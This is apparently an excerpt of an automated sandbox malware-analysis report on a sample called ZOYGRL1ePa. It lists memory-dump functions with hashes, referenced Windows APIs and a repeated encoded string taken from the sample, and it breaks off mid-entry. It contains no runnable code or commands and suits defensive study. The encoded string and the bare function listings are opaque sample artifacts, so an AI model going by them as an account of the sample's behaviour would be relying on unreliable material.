Instruction ID: b0d0ca823a5d4ee229c27b84fea28eaf5d324bdb96ad84c9c7bcf902098e10fe
Opcode Fuzzy Hash: eb48b53b9f5a31db4d135a435253886ce9eb10307ba5842a19a9bd9d0abbea18
Instruction Fuzzy Hash: 5A22FC7254E3D19FD3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7E25D9856C762

Function 0132DA68 Relevance: 2.3, Strings: 1, Instructions: 1012COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: b7dcd44553d2d10f827ba2d04a959c81f3aa03bab4ba584c42f76b14992f3258
Instruction ID: 9213e35b869e2b2203f2a4c33983a35610acfb09dc8add99d4dd0bfa1b618f42
Opcode Fuzzy Hash: b7dcd44553d2d10f827ba2d04a959c81f3aa03bab4ba584c42f76b14992f3258
Instruction Fuzzy Hash: AE22FB7254E3D19FD3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D985AC762

Function 0132DA88 Relevance: 2.2, Strings: 1, Instructions: 996COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 59540ad6ea7fed14c024d479e0977fc65758dd1e5d62cedc92eef0a00bd3f2f6
Instruction ID: 1b3f6798e0ffd09223a9d0b9e0d8bd16c8eb256d3ea27925fefe99799fedb67f
Opcode Fuzzy Hash: 59540ad6ea7fed14c024d479e0977fc65758dd1e5d62cedc92eef0a00bd3f2f6
Instruction Fuzzy Hash: F422FB7254E3D19FC3139B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D985AC762

Function 0132DBE0 Relevance: 2.1, Strings: 1, Instructions: 846COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: ff6fefe46816d1f65b57d8ecf70c23a817a907ae0ea8e2db09e8878a0d146858
Instruction ID: 86476db211d790cdf4802296620229249779a602e51dfef4db9223897f0b1111
Opcode Fuzzy Hash: ff6fefe46816d1f65b57d8ecf70c23a817a907ae0ea8e2db09e8878a0d146858
Instruction Fuzzy Hash: 1712FB7254E3D18FC3139B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D995AC762

Function 0132DC40 Relevance: 2.1, Strings: 1, Instructions: 802COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: da5539c1c0c04a06a928a4e0b10f2a836f38b06ea9f99c9aa3ebc805dff306b6
Instruction ID: 83016978a50bc78ab4b1e71f14ca661642c9ad320c99a2c4dbbf6b9db6fa964a
Opcode Fuzzy Hash: da5539c1c0c04a06a928a4e0b10f2a836f38b06ea9f99c9aa3ebc805dff306b6
Instruction Fuzzy Hash: 43020C7254E3D18FC3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D985AC762

Function 0132DC88 Relevance: 2.0, Strings: 1, Instructions: 771COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 16a3e962d6d2fe5c7bba39b48a508140231844eb6b972ab5fcfb7e820de079e1
Instruction ID: ecf322cecf1eb0b6444d855b4e2b848a92e829e4a0346b80835533c748d14fce
Opcode Fuzzy Hash: 16a3e962d6d2fe5c7bba39b48a508140231844eb6b972ab5fcfb7e820de079e1
Instruction Fuzzy Hash: C9020B7254E3D18FC3039B78D8A56D27FB0AF13228B0E80E7C4C5CA5A7D25D985AC762

Function 0132DCA8 Relevance: 2.0, Strings: 1, Instructions: 758COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DCE0, 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 39e409a933b44aea7dcff08119180ce7b1cb3c555652f63c8c0c22c1bb9a3e2b
Instruction ID: 58e4688130caf29c9bd329579ed428c2033639df053a5b9381c108aa05c3e405
Opcode Fuzzy Hash: 39e409a933b44aea7dcff08119180ce7b1cb3c555652f63c8c0c22c1bb9a3e2b
Instruction Fuzzy Hash: D9020A7214E3D19FC3039B78D8A56D27FB0AF13228B0E80E7C4C5CA5A7D25D985AC762

Function 0132DD28 Relevance: 2.0, Strings: 1, Instructions: 703COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: a69384fdfb478139736f778c7c9d006fcd6c3117a8f989257e7b2ec7ca0fcd41
Instruction ID: 2b9e1d8e142d562ffba4352f81da679d2236bc6adbc796c2fde3b20d763c2302
Opcode Fuzzy Hash: a69384fdfb478139736f778c7c9d006fcd6c3117a8f989257e7b2ec7ca0fcd41
Instruction Fuzzy Hash: 49F10B7254E3D19FC3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D985AC762

Function 0132DD48 Relevance: 1.9, Strings: 1, Instructions: 689COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: d48d2c553cb8a2dfb837c5f66bac6fcc9d25870c6c612c295a46d90d4562cc4b
Instruction ID: df8c7df927f248868e4bb032592ace067d7b6a84c12dbece73a5f85b4a55f979
Opcode Fuzzy Hash: d48d2c553cb8a2dfb837c5f66bac6fcc9d25870c6c612c295a46d90d4562cc4b
Instruction Fuzzy Hash: 5AF10A7214E3D19FC3039B78D8A56D27FB0AF13228B0E80E7C0C5CA5A7D25D985AC762

Function 0132DD68 Relevance: 1.9, Strings: 1, Instructions: 676COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DDE0, 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 937929fbe2447078c5fc9330e1ed4b4c9248ba9f256343818603dc77ca31ee0f
Instruction ID: 9cb384f7ffebe5caea9019e488559fd887939e3979d030dfbf055524247f19f8
Opcode Fuzzy Hash: 937929fbe2447078c5fc9330e1ed4b4c9248ba9f256343818603dc77ca31ee0f
Instruction Fuzzy Hash: 4DE10A7214E3D19FC3039B78D8A56D27FB0AF13228B0E81E7C0C5CE5A7D259995AC762

Function 0132DE28 Relevance: 1.8, Strings: 1, Instructions: 593COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 971644e4bb72040ef4950fc9a02d113e1fb9765cbbf3b7cc1912c5c75e93e2ff
Instruction ID: c5a7a287eeefa5223019430aee25e6cbd9936ec34d5c180583aa12837f8affd5
Opcode Fuzzy Hash: 971644e4bb72040ef4950fc9a02d113e1fb9765cbbf3b7cc1912c5c75e93e2ff
Instruction Fuzzy Hash: 79D11C7214E3D19FC3139B78D8A56D27FB0AF13224B0E81E7C0C5CB5A7D229995AC762

Function 0132DEA8 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 9d66ae38574310d4431f14c4f3bf05b475eadff2be56908cde70ed52cc8ed37c
Instruction ID: d05be3f1ca6279aefe9284dd9fdc598af38bb4bf66c3ec64b14a41fde76b5a34
Opcode Fuzzy Hash: 9d66ae38574310d4431f14c4f3bf05b475eadff2be56908cde70ed52cc8ed37c
Instruction Fuzzy Hash: 31C11B7214E3D19FD3039B78D8A56D27FB0AF13224B0E81E7C0C5CA5A3D229995AC762

Function 0132DEE8 Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 87df75a880896fdac7a03d272c8a99c996243d3682fc5068056141051e36fb0d
Instruction ID: 5dd99e87c9b8df42c2516f0dbdbc12e13095580f961a1889599a9bf06bb28e73
Opcode Fuzzy Hash: 87df75a880896fdac7a03d272c8a99c996243d3682fc5068056141051e36fb0d
Instruction Fuzzy Hash: 02C11B7214D3D19FD3039B78D8A56D27FB0AF13224B0E81E7C4C5CA6A3D229995AC762

Function 0132DF28 Relevance: 1.7, Strings: 1, Instructions: 489COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 5b995a4d8b027aa62b9a879f65e1bc59b2516d5a781e08cac82fdbee11bb96a6
Instruction ID: 22335f8b17af506b4080b575a83c0cb6229f4ee3403028136ce72fa84a016c66
Opcode Fuzzy Hash: 5b995a4d8b027aa62b9a879f65e1bc59b2516d5a781e08cac82fdbee11bb96a6
Instruction Fuzzy Hash: ACB11A7214D3D19FD3139B78D8A66D67FB0AF13224B0E81E7C0C5CB6A3D2299856C762

Function 0132DF48 Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: a0b27b64abd007130e0f6652ec11c6badae22b19449da6a7146e2fc52ed2f57d
Instruction ID: cdc63abcedd51a0414c5c61f38e85907ed285145e6172827a272f939163d26cb
Opcode Fuzzy Hash: a0b27b64abd007130e0f6652ec11c6badae22b19449da6a7146e2fc52ed2f57d
Instruction Fuzzy Hash: A4B11B7214D3D18FD3139B78D8A67D67FB0AF13224B0E81E7C0C5CA6A3D2299956C762

Function 0132DF88 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: 96f928bb0f12d4db342be9832de6536a31f4533e29f3a8dafa899567628529fe
Instruction ID: 8cc75818ee5920511f08c664a956b09a09c2ddf0c2acbfac0d8e950c99f1e0c1
Opcode Fuzzy Hash: 96f928bb0f12d4db342be9832de6536a31f4533e29f3a8dafa899567628529fe
Instruction Fuzzy Hash: C1B12C7214E3D18FD3139B78D8A67D67FB09F13224B0E81E7C0C5CA6A3D2298956C762

Function 0132DFA8 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo, xrefs: 0132DFC8

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: fSW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3Mo
API String ID: 0-2880870057
Opcode ID: a2d5ee5de598690291abf33d6c42f17ec87f50155421f98896e86b6866899e11
Instruction ID: 43e11b1e8cd10410ceb67747732c1a292d3d8cb8696f73032200bb9a6cb0edfe
Opcode Fuzzy Hash: a2d5ee5de598690291abf33d6c42f17ec87f50155421f98896e86b6866899e11
Instruction Fuzzy Hash: 17A13C7214D3D18FD3139B78D8A66D67FB09F13224B0E81E7C0C5CB6A3D2299956C762

Function 06E757F0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 06E7CECC

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 171aefe763a61d8e7aaf10253dd54af3db2fd0cdf50bc47e6046c1c0471f837b
Instruction ID: 38413dbaf03b55bf5b66b5c179bd3303eb160bf515794bf69b286e91f79b2435
Opcode Fuzzy Hash: 171aefe763a61d8e7aaf10253dd54af3db2fd0cdf50bc47e6046c1c0471f837b
Instruction Fuzzy Hash: 2451BEB0D012489FDB54DFA9C584BDDBBF5FF48704F208129E408AB268DB75A949CF94

Function 06E7CDC4 Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 06E7CECC

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 562b211b16f246681730b64eaacdf4a0e4f0caeef869bdccef05ef01d835a982
Instruction ID: 4f97b8c1769014ff6d90d744daf2816a492dce2449425bd46903e336a2ee73c4
Opcode Fuzzy Hash: 562b211b16f246681730b64eaacdf4a0e4f0caeef869bdccef05ef01d835a982
Instruction Fuzzy Hash: A651BEB0D012489FDB14DFA9C984BDDBBF5FF48304F208129E408AB268CB75A949CF94

Function 013BD59C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BE90A

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 60eba6b4d5cbc9f7e8722dde0ae405d6dba6a23ed65b27f979ed8b61096e3388
Instruction ID: d9621026bcddc820b42be1cc0a85115afc282b0b9894f2f1ecbd700e2fe78f73
Opcode Fuzzy Hash: 60eba6b4d5cbc9f7e8722dde0ae405d6dba6a23ed65b27f979ed8b61096e3388
Instruction Fuzzy Hash: 1451BFB1D003099FDB14CF9AC884ADEBBB5FF48314F24812AE919AB250D7759985CF91

Function 013BE7ED Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BE90A

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 85658f6157e44296e0e420659d4eca99c66b2abc36ef8cc04fcf55350ea3fdef
Instruction ID: be88c830c7ed0e95fba3a3d0dbebb12c182bad3b35f7201ae848698c9e1008bc
Opcode Fuzzy Hash: 85658f6157e44296e0e420659d4eca99c66b2abc36ef8cc04fcf55350ea3fdef
Instruction Fuzzy Hash: 1951DFB1D00309DFDB14CFA9C984ADEBFB1BF88314F24812AE518AB210D775A985CF91

Function 07603161 Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0760325F

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b244c9995ccf48c1a43cda235d919a066469298a3a6d61ee81b21f3baffab2f
Instruction ID: cec86b5a64e4348826e3027c91e76c01a99cdfe4af764079284c580f76480fca
Opcode Fuzzy Hash: 0b244c9995ccf48c1a43cda235d919a066469298a3a6d61ee81b21f3baffab2f
Instruction Fuzzy Hash: F14153B0A113518FC72CAF36E98066F77A2FB85305B10892ED5478B794DB32E952DBC1

Function 07603170 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0760325F

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64205ee510c0e3fb20e2e4c90e45ccdfa7e5f5908acc0ebb6b26750ba1c68c3a
Instruction ID: 584940463e5f7828bddd916a1df68805b3b23d29035b9e97bb8c1cb80ab0063f
Opcode Fuzzy Hash: 64205ee510c0e3fb20e2e4c90e45ccdfa7e5f5908acc0ebb6b26750ba1c68c3a
Instruction Fuzzy Hash: 9A4150B0A113518FC72CAF76E98062F76A2FB85305B50892ED5078B794DB32E852CBC1

Function 07116AA4 Relevance: 1.6, APIs: 1, Instructions: 106libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07116AC7

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6736c1ab0f60dbb81532cc5ed80272d7b6984a241af902b2bd468780a9c4d21
Instruction ID: 9e3010780b9324d2fe2d2b54fb1ee13b1d21689b27f5fb069e1cbe62d6e5a821
Opcode Fuzzy Hash: a6736c1ab0f60dbb81532cc5ed80272d7b6984a241af902b2bd468780a9c4d21
Instruction Fuzzy Hash: 5E417B70B012298FCB58AB64C85836D7AF2FF84605F1484A9D40AAB394EF359E85CB81

Function 07116A9B Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07116AC7

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01501d81daa996d41b6568f2c8f10dc48395ee40d0c264b7b1cfc1d8f6685a3f
Instruction ID: 527ec9ffd32e23d4d00c47589e74351f6aab5424e6415919113199ae733228f7
